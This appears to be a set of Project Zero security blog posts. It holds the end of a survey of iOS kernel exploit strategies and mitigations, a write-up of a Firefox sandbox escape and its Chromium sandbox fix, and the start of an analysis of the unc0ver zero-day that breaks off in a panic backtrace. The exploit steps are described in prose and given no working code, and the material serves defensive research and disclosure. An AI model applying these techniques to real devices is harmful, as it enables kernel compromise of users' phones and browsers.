Subsequent exploit flow: The dangling voucher is reallocated with an OOL ports array containing a pointer to a previously-allocated ipc_port overlapping the voucher's iv_refs field. A send right to the voucher port is retrieved by calling thread_get_mach_voucher() and the voucher's reference count is increased by repeatedly calling the vulnerable function, updating the overlapping ipc_port pointer to point into the pipe buffers. Receiving the OOL ports yields a send right to a fake Mach port whose contents can be controlled directly. mach_port_request_notification() is called to insert a pointer to an array containing a pointer to another Mach port in the fake port's ip_requests field. A kernel read primitive is built using pid_for_task(), and the address of the other Mach port is read to compute the address of the fake port. Relevant kernel objects are located and a fake kernel task port is constructed.

machswap2 - iOS 12.1.2

By Ben Sparkes.

The vulnerability: CVE-2019-6225 (same as above).

Exploit strategy: A large number of ipc_voucher objects are sprayed and the vulnerability is triggered twice to decrease the reference count on a voucher and free it. The remaining vouchers on the page are freed and a zone garbage collection is forced, leaving a dangling ipc_voucher pointer in the thread's ith_voucher field.

Subsequent exploit flow: The dangling voucher is reallocated by an OSString buffer containing a fake voucher using an IOSurface property spray. thread_get_mach_voucher() is called to obtain a send right to a newly allocated voucher port for the voucher, which causes a pointer to the voucher port to be stored in the fake voucher overlapping the OSString buffer; reading the OSString property discloses the address of the voucher port. Pipe buffers containing fake task ports are sprayed to land roughly 1 MB after the disclosed port address. The OSString overlapping the fake voucher is freed and reallocated to update the fake voucher's iv_port pointer to point to point into the pipe buffers. thread_get_mach_voucher() is called again to retrieve the updated voucher port, yielding a send right to a fake Mach port at a known address whose contents can be controlled directly. The fake port is converted into a fake task port and a kernel read primitive is established using pid_for_task(). Relevant kernel objects are located and a fake kernel task port is constructed.

Notes: The author developed two versions of this exploit: one for pre-PAN devices, and one for PAN-enabled devices. The exploit presented here is for PAN-enabled devices.

In-the-wild iOS Exploit Chain 5 - iOS 12.1.2

Discovered in-the-wild by Clément Lecigne. Analyzed by Ian Beer and Samuel Groß.

The vulnerability: CVE-2019-6225 (same as above).

Exploit strategy: A large number of ipc_voucher objects are sprayed and the vulnerability is triggered to decrease the reference count on a voucher and free it. The remaining vouchers on the page are freed and a zone garbage collection is forced, leaving a dangling ipc_voucher pointer in the thread's ith_voucher field.

Subsequent exploit flow: The dangling voucher is reallocated by an OOL memory spray. A large number of Mach ports are allocated and then thread_get_mach_voucher() is called to obtain a send right to a newly allocated voucher port for the voucher, which causes a pointer to the voucher port to be stored in the fake voucher overlapping the OOL ports array. More ports are allocated and then the OOL memory spray is received, disclosing the address of the voucher port for the fake voucher. The dangling voucher is reallocated again with another OOL memory spray that updates the voucher's iv_port pointer to the subsequent page. The Mach ports are destroyed and a zone garbage collection is forced, leaving the fake voucher holding a pointer to a dangling port. The dangling port is reallocated with pipe buffers. Finally, thread_get_mach_voucher() is called, yielding a send right to a fake Mach port at a known address whose contents can be controlled directly. The fake port is converted into a fake task port and a kernel read primitive is established using pid_for_task(). Relevant kernel objects are located and the fake port is converted into a fake kernel task port.

In-the-wild iOS Exploit Chain 4 - iOS 12.1.3

Discovered in-the-wild by Clément Lecigne. Analyzed by Ian Beer and Samuel Groß. Also reported by an anonymous researcher.

The vulnerability: CVE-2019-7287 is a linear heap buffer overflow in the IOKit function ProvInfoIOKitUserClient::ucEncryptSUInfo() due to an unchecked memcpy().

Exploit strategy: The kernel heap is groomed to place holes in kalloc.4096 before an OOL ports array and holes in kalloc.6144 before an OSData buffer accessible via IOSurface properties. The vulnerability is triggered with the source allocated from kalloc.4096 and the destination allocated from kalloc.6144, causing the address of a target Mach port to be copied into the OSData buffer. The OSData buffer is then read, disclosing the address of the target port. The heap is groomed again to place holes in kalloc.4096 before an OOL memory buffer and in kalloc.6144 before an OOL ports array. The vulnerability is triggered again to insert a pointer to the target port into the OOL ports array. The target port is freed and a zone garbage collection is forced, leaving a dangling port pointer in the OOL ports array. The dangling port is reallocated with pipe buffers and the OOL ports are received, giving a receive right to a fake Mach port at a known address whose contents can be controlled directly.

Subsequent exploit flow: The fake port is converted into a fake clock port and clock_sleep_trap() is used to brute force KASLR. The fake port is converted into a fake task port and a kernel read primitive is established using pid_for_task(). Relevant kernel objects are located and the fake port is converted into a fake kernel task port.

Attacking iPhone XS Max - iOS 12.1.4

By Tielei Wang (@wangtielei) and Hao Xu (@windknown).

The vulnerability: The vulnerability is a race condition in XNU's UNIX domain socket bind implementation due to the temporary unlock antipattern that results in a use-after-free.

Exploit strategy: Sockets are sprayed and the vulnerability is triggered to leave a pointer to a dangling socket pointer in a vnode struct. The sockets are closed, a zone garbage collection is forced, and the sockets are reallocated with controlled data via an OSData spray (possibly an IOSurface property spray). The fake socket is constructed to have a reference count of 0. The use after free is triggered to call socket_unlock() on the fake socket, which causes the fake socket/OSData buffer to be freed using kfree(). This leaves a dangling OSData buffer accessible using unspecified means.

Subsequent exploit flow: The dangling OSData buffer is reallocated with an OOL ports array and the OSData buffer is freed, leaving a dangling OOL ports array. Kernel memory is sprayed to place a fake Mach port at a hardcoded address (or an information leak is used) and the OOL ports array is reallocated with another OSData buffer, inserting a pointer to the fake Mach port into the OOL ports array. The OOL ports are received, yielding a send or receive right to the fake Mach port at a known address. The fake port is converted into a fake kernel task port by unspecified means.

Notes: The only reference for this exploit is a BlackHat presentation, hence the uncertainties in the explanations above.

The authors developed two versions of this exploit: one for non-PAC devices, and one for PAC-enabled devices. The exploit presented here is for PAC-enabled devices. The non-PAC exploit is substantially simpler (hijacking a function pointer used by socket_lock()).

SockPuppet - iOS 12.2 and iOS 12.4

By Ned Williamson (@nedwilliamson) working with Google Project Zero.

The vulnerability: CVE-2019-8605 is a use-after-free due to XNU's in6_pcbdetach() failing to clear a freed pointer.

Exploit strategy: Safe arbitrary read, arbitrary kfree(), and arbitrary Mach port address disclosure primitives are constructed over the vulnerability.

The arbitrary read primitive: The vulnerability is triggered multiple times to create a number of dangling ip6_pktopts structs associated with sockets. The dangling ip6_pktopts are reallocated with an OSData buffer spray via IOSurface properties such that ip6po_minmtu is set to a known value and ip6po_pktinfo is set to the address to read. The ip6po_minmtu field is checked via getsockopt(), and if correct, getsockopt(IPV6_PKTINFO) is called to read 20 bytes of data from the address pointed to by ip6po_pktinfo.

The arbitrary kfree() primitive: The vulnerability is triggered multiple times to create a number of dangling ip6_pktopts structs associated with sockets. The dangling ip6_pktopts are reallocated with an OSData buffer spray via IOSurface properties such that ip6po_minmtu is set to a known value and ip6po_pktinfo is set to the address to free. The ip6po_minmtu field is checked via getsockopt(), and if correct, setsockopt(IPV6_PKTINFO) is called to invoke kfree_addr() on the ip6po_pktinfo pointer.

The arbitrary Mach port address disclosure primitive: The vulnerability is triggered multiple times to create a number of dangling ip6_pktopts structs associated with sockets. The dangling ip6_pktopts are reallocated with an OOL ports array spray containing pointers to the target port. The ip6po_minmtu and ip6po_prefer_tempaddr fields are read via getsockopt(), disclosing the value of the target port pointer. The port is checked to be of the expected type using the arbitrary read primitive.

Subsequent exploit flow: The Mach port address disclosure primitive is used to disclose the address of the current task. Two pipes are created and the addresses of the pipe buffers in the kernel are found using the kernel read primitive. Relevant kernel objects are located and a fake kernel task port is constructed in one of the pipe buffers. The arbitrary kfree() primitive is used to free the pipe buffer for the other pipe, and the pipe buffer is reallocated by spraying OOL ports arrays. The pipe is then written to insert a pointer to the fake kernel task port into the OOL ports array, and the OOL ports are received, yielding a fake kernel task port.

Notes: Unlike most other exploits on this list which are structured linearly, SockPuppet is structured hierarchically, building on the same primitives throughout. This distinct structure is likely due to the power and stability of the underlying vulnerability: the bug directly provides both an arbitrary read and an arbitrary free primitive, and in practice both primitives are 100% safe and reliable because it is possible to check that the reallocation is successful. However, this structure means that there is no clear temporal boundary in the high-level exploit flow between the vulnerability-specific and generic exploitation. Instead, that boundary occurs between conceptual layers in the exploit code.

The SockPuppet bug was fixed in iOS 12.3 but reintroduced in iOS 12.4.

AppleAVE2Driver exploit - iOS 12.4.1

By 08Tc3wBB (@08Tc3wBB).

The vulnerability: CVE-2019-8795 is a memory corruption in AppleAVE2Driver whereby improper bounds checking leads to processing of out-of-bounds data, eventually resulting in a controlled virtual method call or arbitrary kfree(). CVE-2019-8794 is a kernel memory disclosure in AppleSPUProfileDriver due to uninitialized stack data being shared with userspace.

Exploit strategy: The KASLR slide is discovered using the AppleSPUProfileDriver vulnerability. OSData buffers containing fake task ports are sprayed using IOSurface properties. The vulnerability is triggered to free an OSData buffer at a hardcoded address, leaving a dangling OSData buffer accessible via IOSurface properties.

Subsequent exploit flow: The dangling OSData buffer is reallocated with an OOL ports array and the OSData buffer is freed, leaving a dangling OOL ports array. The OOL ports array is reallocated with another OSData buffer, inserting pointers to the fake task ports sprayed earlier into the OOL ports array. The OOL ports are received, yielding send rights to the fake task ports, and pid_for_task() is used to read pointers to relevant kernel objects. The OSData buffer is freed and reallocated to convert one of the fake ports into a fake kernel task port.

Notes: iOS versions up to 13.1.3 were vulnerable, but the exploit presented here targeted iOS 12.4.1.

The author developed two versions of this exploit: one for non-PAC devices, and one for PAC-enabled devices. The exploit presented here is for PAC-enabled devices.

oob_timestamp - iOS 13.3

By Brandon Azad.

The vulnerability: CVE-2020-3837 is a linear heap out-of-bounds write of up to 8 bytes of timestamp data in IOKit's IOAccelCommandQueue2::processSegmentKernelCommand() due to incorrect bounds checking.

Exploit strategy: The kernel map is groomed to lay out two 96 MB shared memory regions, an 8-page ipc_kmsg, an 8-page OOL ports array, and 80 MB of OSData buffers sprayed via IOSurface properties. The number of bytes to overflow is computed based on the current time and the overflow is triggered to corrupt the ipc_kmsg's ikm_size field, such that the ipc_kmsg now has a size of between 16 pages and 80 MB. The port containing the ipc_kmsg is destroyed, freeing the corrupted ipc_kmsg, the OOL ports array, and some of the subsequent OSData buffers. More OSData buffers are sprayed via IOSurface to reallocate the OOL ports array containing a pointer to a fake Mach port at a hardcoded address that is likely to overlap one of the 96 MB shared memory regions. The OOL ports are received, producing a receive right to a fake Mach port at a known address whose contents can be controlled directly.

Subsequent exploit flow: A kernel memory read primitive is constructed using pid_for_task(). Relevant kernel objects are located and a fake kernel task port is constructed.

Notes: iOS 13 introduced zone_require, a mitigation that checks whether certain objects are allocated from the expected zalloc zone before they are used. An oversight in the implementation led to a trivial bypass when objects are allocated outside of the zalloc_map.

References: oob_timestamp exploit code.

tachy0n (unc0ver 5.0.0) - iOS 13.5

By Pwn20wnd (@Pwn20wnd), unc0ver Team (@unc0verTeam), and Siguza.

The vulnerability: The "LightSpeed" vulnerability (see "Spice" above; reintroduced in iOS 13).

Exploit strategy: (Analysis pending.) The vulnerable function is called in a loop in one thread to repeatedly trigger the vulnerability by allocating a buffer from kalloc.16 and racing to free the buffer twice. Preliminary results suggest that the freed kalloc.16 slot is reallocated by OSData buffers sprayed via IOSurface properties.

Subsequent exploit flow: (Analysis pending.)

Notes: The unc0ver exploit was released as an obfuscated binary; a more complete analysis of the exploit strategy and exploit flow will be released after the tachy0n exploit code is published.

While iOS 12 patched the LightSpeed vulnerability, the patch did not address the root cause and created a memory leak. This memory leak was fixed in iOS 13, but the change also reintroduced the old (vulnerable) behavior. This is a regression, not a variant: the original LightSpeed POC does trigger on iOS 13.

References: LightSpeed, a race for an iOS/macOS sandbox escape, unc0ver-v5.0.0.ipa.

iOS kernel exploit mitigations

Next we will look at some current iOS kernel exploit mitigations. This list is not exhaustive, but it briefly summarizes some of the mitigations that exploit developers may encounter up through iOS 13.

Kernel Stack Canaries - iOS 6

iOS 6 introduced kernel stack canaries (or stack cookies) to protect against stack buffer overflows in the kernel.

None of the exploits in this list are affected by the presence of stack canaries as they do not target stack buffer overflow vulnerabilities.

Kernel ASLR - iOS 6

Kernel Address Space Layout Randomization (Kernel ASLR or KASLR) is a mitigation that randomizes the base address of the kernelcache image in the kernel address space. Before Kernel ASLR was implemented, the addresses of kernel functions and objects in the kernelcache image were always located at a fixed address.

Bypassing or working around KASLR is a standard step of all modern iOS kernel exploits.

Kernel Heap ASLR - iOS 6

Since iOS 6 the base addresses for various kernel heap regions have been randomized. This seeks to mitigate exploits that hardcode addresses at which objects will be deterministically allocated. 

Working around kernel heap randomization is a standard step of modern iOS kernel exploits. Usually this involves heap spraying, in which the kernel is induced to allocate large amounts of data to influence the shape of the heap even when exact addresses are not known. Also, many vulnerabilities can be leveraged to produce an information leak, disclosing the addresses of relevant kernel objects on the heap.

W^X / DEP - iOS 6

iOS 6 also introduced substantial kernel address space hardening by ensuring that kernel pages are mapped either as writable or as executable, but never both (often called "write xor execute" or W^X). This means that page tables no longer map kernel code pages as writable, and the kernel heap and stack are no longer mapped as executable. (Ensuring that non-code data is not mapped as executable is often called Data Execution Prevention, or DEP.)

Modern public iOS exploits do not attempt to bypass W^X (e.g. by modifying page tables and injecting shellcode); instead, exploitation is achieved by modifying kernel data structures and performing code-reuse attacks instead. This is largely due to the presence of a stronger, hardware-enforced W^X mitigation called KTRR.

PXN - iOS 7

Apple's A7 processor was the first 64-bit, ARMv8-A processor in an iPhone. Previously, iOS 6 had separated the kernel and user address space so that user code and data pages were inaccessible during normal kernel execution. With the move to 64-bit, the address spaces were no longer separated. Thus, the Privileged Execute-Never (PXN) bit was set in page table entries to ensure that the kernel could not execute shellcode residing in userspace pages.

Similarly to W^X, PXN as a protection against jumping to userspace shellcode is overshadowed by the stronger protection of KTRR.

PAN - iOS 10

Privileged access-never (PAN) is an ARMv8.1-A security feature introduced with the Apple A10 processor that prevents the kernel from accessing virtual addresses that are also accessible to userspace. This is used to prevent the kernel from dereferencing attacker-supplied pointers to data structures in userspace. It is similar to the Supervisor Mode Access Prevention (SMAP) feature on some Intel processors.

While PAN has been bypassed before, modern public iOS kernel exploits usually work around PAN by spraying data into the kernel and then learning the address of the data. While the most reliable techniques involve disclosing the address of the data inserted into the kernel, techniques exist to work around PAN generically, such as spraying enough data to overwhelm the kernel map randomization and force a fixed, hardcoded address to be allocated with the controlled data. Other primitives exist for establishing shared memory mappings between userspace and the kernel, which can also be used to work around PAN.

KTRR - iOS 10

KTRR (possibly Kernel Text Readonly Region, part of Kernel Integrity Protection) is a custom hardware security mitigation introduced on the Apple A10 processor (ARMv8.1-A). It is a strong form of W^X protection enforced by the MMU and the memory controller over a single span of contiguous memory covering the read-only parts of the kernelcache image and some sensitive data structures like top-level page tables and the trust cache. It has also been referred to by Apple as Kernel Integrity Protection (KIP) v1.

While KTRR has been publicly bypassed twice before, modern public iOS kernel exploits usually work around KTRR by not manipulating KTRR-protected memory.

APRR - iOS 11

APRR (possibly standing for Access Protection Rerouting or Access Permission Restriction Register) is a custom hardware feature on Apple A11 and later CPUs that indirects virtual memory access permissions (usually specified in the page table entry for the page) through a special register, allowing access permissions for large groups of pages to be changed atomically and per-core. It works by converting the bits in the PTE that typically directly specify the access permissions into an index into a special register containing the true access permissions; changing the register value swaps protections on all pages mapped with the same access permissions index. APRR is somewhat similar to the Memory Protection Keys feature available on newer Intel processors.

APRR on its own does not provide any security boundaries, but it makes it possible to segment privilege levels inside a single address space. It is heavily used by PPL to create a security boundary within the iOS kernel.

PPL - iOS 12

PPL (Page Protection Layer) is the software layer built on APRR and dependent on KTRR that aims to put a security boundary between kernel read/write/execute and direct page table access. The primary goal of PPL is to prevent an attacker from modifying user pages that have been codesigned (e.g. using kernel read/write to overwrite a userspace process's executable code). This necessarily means that PPL must also maintain total control over the page tables and prevent an attacker from mapping sensitive physical addresses, including page tables, page table metadata, and IOMMU registers.

As of May 2020, PPL has not been publicly bypassed. That said, modern iOS kernel exploits are so far unaffected by PPL.

PAC - iOS 12

Pointer Authentication Codes (PAC) is an ARMv8.3-A security feature that mitigates pointer tampering by storing a cryptographic signature of the pointer value in the upper bits of the pointer. Apple introduced PAC with the A12 and significantly hardened the implementation (compared to the ARM standard) in order to defend against attackers with kernel read/write, although for most purposes it is functionally indistinguishable. Apple's kernel uses PAC for control flow integrity (CFI), placing a security boundary between kernel read/write and kernel code execution.

Despite numerous public bypasses of the iOS kernel's PAC-based CFI, PAC in the kernel is still an effective exploit mitigation: it has severely restricted exploitability of many bugs and killed some exploit techniques. For example, exploits in the past have used a kernel execute primitive in order to build a kernel read/write primitive (see e.g. ziVA); that is no longer possible on A12 without bypassing PAC first. Furthermore, extensive use of PAC-protected pointers in IOKit has made it significantly harder to turn many bugs into useful primitives. Given the long history of serious security issues in IOKit, this is a substantial win.

zone_require - iOS 13

zone_require is a software mitigation introduced in iOS 13 that adds checks that certain pointers are allocated from the expected zalloc zones before using them. The most common zone_require checks in the iOS kernelcache are of Mach ports; for example, every time an ipc_port is locked, the zone_require() function is called to check that the allocation containing the Mach port resides in the ipc.ports zone (and not, for example, an OSData buffer allocated with kalloc()).

Since fake Mach ports are an integral part of modern techniques, zone_require has a substantial impact on exploitation. Vulnerabilities like CVE-2017-13861 (async_wake) that drop a reference on an ipc_port no longer offer a direct path to creating a fake port. While zone_require has been publicly bypassed once, the technique relied on an oversight in the implementation that is easy to correct.

Changelog

2020/07/09
An entry was added for tachy0n (unc0ver 5.0.0) - iOS 13.5.
2020/06/19
The entry on MachSwap was replaced with machswap2, since the latter works on PAN-enabled devices.
An entry was added for AppleAVE2Driver exploit - iOS 12.4.1.
The description for PAN was updated to clarify that it was introduced with the A10 processor, not iOS 10.
The description for PPL was updated to clarify that it primarily protects userspace processes, as the kernel's code is protected by KTRR.
2020/06/11
Original post published.

FF Sandbox Escape (CVE-2020-12388)

17 June 2020 at 15:58
By: Tim

By James Forshaw, Project Zero


In my previous blog post I discussed an issue with the Windows Kernel’s handling of Restricted Tokens which allowed me to escape the Chrome GPU sandbox. Originally I’d planned to use Firefox for the proof-of-concept as Firefox uses the same effective sandbox level as the Chrome GPU process for its content renderers. That means a FF content RCE would give code execution in a sandbox where you could abuse the Windows Kernel Restricted Tokens issue, making it much more serious.

However, while researching the sandbox escape I realized that was the least of FF’s worries.  The use of the GPU level sandbox for multiple processes introduced a sandbox escape vector, even once the Windows issue was fixed. This blog post is about the specific behavior of the Chromium sandbox and why FF was vulnerable. I’ll also detail the changes I made to the Chromium sandbox to introduce a way of mitigating the issue which was used by Mozilla to fix my report.

For reference the P0 issue is 2016 and the FF issue is 1618911. FF define their own sandboxing profiles defined on this page. The content sandbox at the time of writing is defined as Level 5, so I’ll refer to L5 going forward rather than a GPU sandbox.

Root Cause

The root cause of the issue is that with L5, one content process can open another for full access. In Chromium derived browsers this isn’t usually an issue, only one GPU process is running at a time, although there could be other non-Chromium processes running at the same time which might be accessible. The sandbox used by content renderers in Chromium are significantly more limited and they should not be able to open any other processes.

The L5 sandbox uses a Restricted Token as the primary sandbox enforcement. The reason one content process can access another is down to the Default DACL of the Primary Token of the process. For a content process the Default DACL which is set in RestrictedToken::GetRestrictedToken grants full access to the following users:

User
Access
Current User
Full Access
NT AUTHORITY\SYSTEM
Full Access
NT AUTHORITY\RESTRICTED
Full Access
Logon SID
Read and Execute Access

The Default DACL is used to set the initial Process and Thread Security Descriptors. The Token level used by L5 is USER_LIMITED which disables almost all groups except for:
  • Current User
  • BUILTIN\Users
  • Everyone
  • NT AUTHORITY\INTERACTIVE
  • Logon SID

And adds the following restricted SIDs:
  • BUILTIN\Users
  • Everyone
  • NT AUTHORITY\RESTRICTED
  • Logon SID.

Tying all this together the combination of the Current User Group and the RESTRICTED restricted SID results in granting full access to the sandbox Process or Thread.

To understand why being able to open another content process was such a problem, we have to understand how the Chromium sandbox bootstraps a new process. Due to the way Primary Tokens are assigned to a new process, once the process starts it can no longer be changed for a different token. You can do a few things, such as deleting privileges and dropping the Integrity Level, but removing groups or adding new restricted SIDs isn’t possible. 

A new sandboxed process needs to do some initial warm up which might require more access than is granted to the restricted sandbox Token, so Chromium uses a trick. It assigns a more privileged Impersonation Token to the initial thread, so that the warmup runs with higher privileges. For L5 the level for the initial Token is USER_RESTRICTED_SAME_ACCESS which just creates a Restricted Token with no disabled groups and all the normal groups added as restricted SIDs. This makes the Token almost equivalent to a normal Token but is considered Restricted. Windows would block setting the Token if the Primary Token is Restricted but the Impersonation Token is not.

The Impersonation Token is dropped once all warmup has completed by calling the LowerToken function in the sandbox target services. What this means is there’s a time window when a new sandbox process starts to when LowerToken is called where the process is effectively running unsandboxed, except for having a Low IL. If you could hijack execution before the impersonation is dropped you could immediately gain privileges, sufficient to escape the sandbox.

Simple timeline showing process starting at USER_RESTRICTED_SAME_ACCESS level, transitioning to USER_LIMITED when the token is dropped.

Unlike the Chrome GPU process FF will spawn a new content process regularly during normal use. Just creating a new tab can spawn a new process. Therefore one compromised content process only has to wait around until a new process is created then immediately hijack it. A compromised renderer can almost certainly force a new process to be created through an IPC call, but I didn’t investigate that further.

With this knowledge I developed a full POC using many of the same techniques as in the previous blog post. The higher privileges of the USER_RESTRICTED_SAME_ACCESS Token simplifies the exploit. For example we no longer need to hijack the COM Server’s thread as the more privileged Token allows us to directly open the process. Also, crucially we never need to leave the Restricted Sandbox therefore the exploit doesn’t rely on the kernel bug MS fixed for the previous issue. You can find the full POC attached to the issue, and I’ve summarised the steps in the following diagram.

Diagram showing the transitions from a compromised Firefox Content Process, through COM and UI Access to escape the sandbox.

Developing a Fix

In my report I suggested a fix for the issue, enabling the SetLockdownDefaultDacl option in the sandbox policy. SetLockdownDefaultDacl removes both the RESTRICTED and Logon SIDs from the Default DACL which would prevent one L5 process opening another. I had added this sandbox policy function in response to the GPU sandbox escape I mentioned in the previous blog, which was used by lokihardt at Pwn2Own. However the intention was to block the GPU process opening a renderer process and not to prevent one GPU process from opening another. Therefore the policy was not set on the GPU sandbox, but only on renderers.

It turns out that I wasn’t the first person to report the ability of one FF content process opening another. Niklas Baumstark had reported it a year prior to my report. The fix I had suggested, enabling SetLockdownDefaultDacl had been tried in fixing Niklas’ report and it broke various things including the DirectWrite cache and Audio Playback as well as significant performance regressions which made applying SetLockdownDefaultDacl undesirable. The reason things such as the DirectWrite cache break is due to a typical coding pattern in Windows RPC services as shown below:

int RpcCall(handle_t handle, LPCWSTR some_value) {
  DWORD pid;
  I_RpcBindingInqLocalClientPID(handle, &pid);

  RpcImpersonateClient(handle);
  HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, nullptr, pid);
  if (!process)
    return ERROR_ACCESS_DENIED;

  ...
}

This example code is running in a privileged service and is called over RPC by the sandboxed application. It first calls the RPC runtime to query the caller’s Process ID. Then it impersonates the caller and tries to open a handle to the calling process. If opening the process fails then the RPC call returns an access denied error.

For normal applications it’s a perfectly reasonable assumption that the caller can access its own process. However, once we lockdown the process security this is no longer the case. If we’re blocking access to other processes at the same level then as a consequence we also block opening our own process. Normally this isn’t an issue as most code inside the process uses the Current Process Pseudo handle which never goes through an access check.

Niklas’ report didn’t come with a full sandbox escape. The lack of a full POC plus the difficulty in fixing it resulted in the fix stalling. However, with a full sandbox escape demonstrating the impact of the issue, Mozilla would have to choose between performance or  security unless another fix could be implemented. As I’m a Chromium committer as well as an owner of the Windows sandbox I realized I might be better placed to fix this than Mozilla who relied on our code.

The fix must do two things:
  • Grant the process access to its own process and threads.
  • Deny any other process at the same level.

Without any administrator privileges many angles, such as Kernel Process Callbacks are not available to us. The fix must be entirely in user-mode with normal user privileges. 

The key to the fix is the list of restricted SIDs can include SIDs which are not present in the Token’s existing groups. We can generate a random SID per-sandbox process which is added both as a restricted SID and into the Default DACL. We can then use SetLockdownDefaultDacl to lockdown the Default DACL.

When opening the process the access check will match on the Current User SID for the normal check, and the Random SID for the restricted SID check. This will also work over RPC. However, each content process will have a different Random SID, so while the normal check will still pass, the access check can’t successfully pass the restricted SID check. This achieves our goals. You can check the implementation in PolicyBase::MakeTokens.

I added the patch to the Chromium repository and FF was able to merge it and test it. It worked to block the attack vector as well as seemingly not introducing the previous performance issues. I say, “seemingly,” as part of the problem with any changes such as this is that it’s impossible to know for certain that some RPC service or other code doesn’t rely on specific behaviors to function which a change breaks. However, this code is now shipping in FF76 so no doubt it’ll become apparent if there are issues. 

Another problem with the fix is it’s opt-in, to be secure every other process on the system has to opt in to the mitigation including all Chromium browsers as well as users of Chromium such as Electron. For example, if Chrome isn’t updated then a FF content process could kill Chrome’s GPU process, that would cause Chrome to restart it and the FF process could escape via Chrome by hijacking the new GPU process. This is why, even though not directly vulnerable, I enabled the mitigation on the Chromium GPU process which has shipped in M83 (and Microsoft Edge 83) released at the end of April 2020.

In conclusion, this blog post demonstrated a sandbox escape in FF which required adding a new feature to the Chromium sandbox. In contrast to the previous blog post it was possible to remediate the issue without requiring a change in Windows code that FF or Chromium don’t have access to. That said, it’s likely we were lucky that it was possible to change without breaking anything important. Next time it might not be so easy.

How to unc0ver a 0-day in 4 hours or less

9 July 2020 at 16:04
By: Tim
By Brandon Azad, Project Zero

At 3 PM PDT on May 23, 2020, the unc0ver jailbreak was released for iOS 13.5 (the latest signed version at the time of release) using a zero-day vulnerability and heavy obfuscation. By 7 PM, I had identified the vulnerability and informed Apple. By 1 AM, I had sent Apple a POC and my analysis. This post takes you along that journey.

Initial identification

I wanted to find the vulnerability used in unc0ver and report it to Apple quickly in order to demonstrate that obfuscating an exploit does little to prevent the bug from winding up in the hands of bad actors.

After downloading and extracting the unc0ver IPA, I loaded the main executable into IDA to take a look. Unfortunately, the binary was heavily obfuscated, so finding the bug statically was beyond my abilities.

Image showing a screenshot of IDA Pro with heavily obfuscated code


Next I loaded the unc0ver app onto an iPod Touch 7 running iOS 13.2.3 to try running the exploit. Exploring the app interface didn't suggest that the user had any sort of control over which vulnerability was used to exploit the device, so I hoped that unc0ver only had support for the one 0-day and did not use the oob_timestamp bug instead on iOS 13.3 and lower.

As I was clicking the "Jailbreak" button, a thought occurred to me: Having written a few kernel exploits before, I understood that most memory-corruption-based exploits have something of a "critical section" during which kernel state has been corrupted and the system would be unstable if the rest of the exploit did not continue. So, on a whim, I double clicked the home button to bring up the app switcher and killed the unc0ver app.

The device immediately panicked.

panic(cpu 1 caller 0xfffffff020e75424): "Zone cache element was used after free! Element 0xffffffe0033ac810 was corrupted at beginning; Expected 0x87be6c0681be12b8 but found 0xffffffe003059d90; canary 0x784193e68284daa8; zone 0xfffffff021415fa8 (kalloc.16)"
Debugger message: panic
Memory ID: 0x6
OS version: 17B111
Kernel version: Darwin Kernel Version 19.0.0: Wed Oct  9 22:41:51 PDT 2019; root:xnu-6153.42.1~1/RELEASE_ARM64_T8010
KernelCache UUID: 5AD647C26EF3506257696CF29419F868
Kernel UUID: F6AED585-86A0-3BEE-83B9-C5B36769EB13
iBoot version: iBoot-5540.40.51
secure boot?: YES
Paniclog version: 13
Kernel slide:     0x0000000019cf0000
Kernel text base: 0xfffffff020cf4000
mach_absolute_time: 0x3943f534b
Epoch Time:        sec       usec
  Boot    : 0x5ec9b036 0x0004cf8d
  Sleep   : 0x00000000 0x00000000
  Wake    : 0x00000000 0x00000000
  Calendar: 0x5ec9b138 0x0004b68b

Panicked task 0xffffffe0008a4800: 9619 pages, 230 threads: pid 222: unc0ver
Panicked thread: 0xffffffe004303a18, backtrace: 0xffffffe00021b2f0, tid: 4884
  lr: 0xfffffff007135e70  fp: 0xffffffe00021b330
  lr: 0xfffffff007135cd0  fp: 0xffffffe00021b3a0
  lr: 0xfffffff0072345c0  fp: 0xffffffe00021b450
  lr: 0xfffffff0070f9610  fp: 0xffffffe00021b460
  lr: 0xfffffff007135648  fp: 0xffffffe00021b7d0
  lr: 0xfffffff007135990  fp: 0xffffffe00021b820
  lr: 0xfffffff0076e1ad4  fp: 0xffffffe00021b840
  lr: 0xfffffff007185424  fp: 0xffffffe00021b8b0
  lr: 0xfffffff007182550  fp: 0xffffffe00021b9e0
  lr: 0xfffffff007140718  fp: 0xffffffe00021ba30
  lr: 0xfffffff0074d5bfc  fp: 0xffffffe00021ba80
  lr: 0xfffffff0074d5d90  fp: 0xffffffe00021bb40 
  lr: 0xfffffff0075f10d0  fp: 0xffffffe00021bbd0
  lr: 0xfffffff00723468c  fp: 0xffffffe00021bc80
  lr: 0xfffffff0070f9610  fp: 0xffffffe00021bc90
  lr: 0x00000001bf085ae4  fp: 0x0000000000000000

This seemed promising! I had a panic message saying there was a use-after-free in the kalloc.16 allocation zone (general purpose allocations of size up to 16 bytes). However, it was possible that this was a symptom of the memory corruption rather than the source of the memory corruption (or even a decoy!). To investigate further, I'd need to analyze the backtrace.

While waiting for IDA to process the iPod's kernelcache, I tried a few more off-the-cuff experiments. Since many exploits use Mach ports as a fundamental primitive, I wrote an app that would churn up the ipc.ports zone, creating fragmentation and mixing up the freelist. When I ran the unc0ver app afterwards the exploit still worked, suggesting that it may not rely on heap grooming of Mach port allocations.

Next, since the panic log mentioned kalloc.16, I decided to write an app that would continuously allocate and free to kalloc.16 in the background during the unc0ver exploit. The idea was that if unc0ver relies on reallocating a kalloc.16 allocation, then my app might grab that slot instead, which would likely cause the exploit strategy to fail and possibly result in a kernel panic. And sure enough, with my app hammering kalloc.16 in the background,  touching the "Jailbreak" button caused an immediate kernel panic.

As a sanity check, I tried changing my app to hammer a different zone, kalloc.32, instead of kalloc.16. This time the exploit ran successfully, suggesting that kalloc.16 is indeed the critical allocation zone used by the exploit.

Finally, once IDA had finished analyzing the iPod kernelcache, I started symbolicating the stacktraces collected from the panic logs.

Panicked task 0xffffffe0008a4800: 9619 pages, 230 threads: pid 222: unc0ver
Panicked thread: 0xffffffe004303a18, backtrace: 0xffffffe00021b2f0, tid: 4884
  lr: 0xfffffff007135e70
  lr: 0xfffffff007135cd0
  lr: 0xfffffff0072345c0
  lr: 0xfffffff0070f9610
  lr: 0xfffffff007135648
  lr: 0xfffffff007135990
  lr: 0xfffffff0076e1ad4  # _panic
  lr: 0xfffffff007185424  # _zcache_alloc_from_cpu_cache
  lr: 0xfffffff007182550  # _zalloc_internal
  lr: 0xfffffff007140718  # _kalloc_canblock
  lr: 0xfffffff0074d5bfc  # _aio_copy_in_list
  lr: 0xfffffff0074d5d90  # _lio_listio
